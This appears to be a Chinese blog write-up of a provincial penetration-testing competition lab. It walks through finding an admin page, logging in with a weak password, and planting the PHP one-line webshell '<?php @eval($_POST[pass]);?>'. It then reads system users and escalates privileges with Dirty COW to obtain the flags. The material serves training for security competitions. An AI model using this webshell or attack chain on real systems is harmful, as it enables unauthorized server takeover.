某省综合渗透测试(环境)

需要环境私信发联系方式

1.通过 PC 中的渗透测试平台 Kali 对服务器场景进行渗透测试,将后台管理

 Flag   IP   0.0.0.0 

http://0.0.0.0.0/login.php

flag:http://0.0.0.0/admin.php

扫描靶机目录发现后台地址 admin.php

2.通过 PC 中的渗透测试平台 Kali 对服务器场景进行渗透测试,将后台管理 员的密码作为 Flag 提交;

Flag:admin

弱密码admin成功登录

3.通过 PC 中的渗透测试平台 Kali 对服务器场景进行渗透测试,获取到相应 的权限,使用相关命令获取到当前系统用户 id 为 69 的用户,将该用户的用户名 称作为 Flag 进行提交;

Flag: vcsa

https://i-blog.csdnimg.cn/blog_migrate/953750a315e83102475f28cf888ee3bd.png

在指定位置找到写入php代码位置

写入一句话木马

<?php @eval($_POST[pass]);?>

同上的方法执行

用蚁键或者网页命令执行查看passwd所有用户的命令 命令执行之后发现admin用户和id69用户

4.通过 PC 中的渗透测试平台 Kali 对服务器场景进行渗透测试,获取到相应 的权限,使用 whoami 命令获取当前用户,将获取到的用户作为 Flag 提交;

Flag:apache


5. 通过PC中的渗透测试平台Kali对服务器场景进行渗透测试,获取到相应的权限,将/var/www目录下的图片文件内容作为Flag提交;

Flag: security

6. 通过PC中的渗透测试平台Kali对服务器场景进行渗透测试,找到靶机内的脏牛漏洞提权文件,将文件名作为Flag提交;

Flag: dirty

尝试弱密码123456登录admin用户 用藏牛提权firefart

7.提权之后登陆靶机,进入靶机的/root 目录将 root 目录的 flag.txt 文件 的内容作为 Flag 提交

Flag: c4ca4238a0b923820dcc509a6f75849b

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

m0_46056107

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值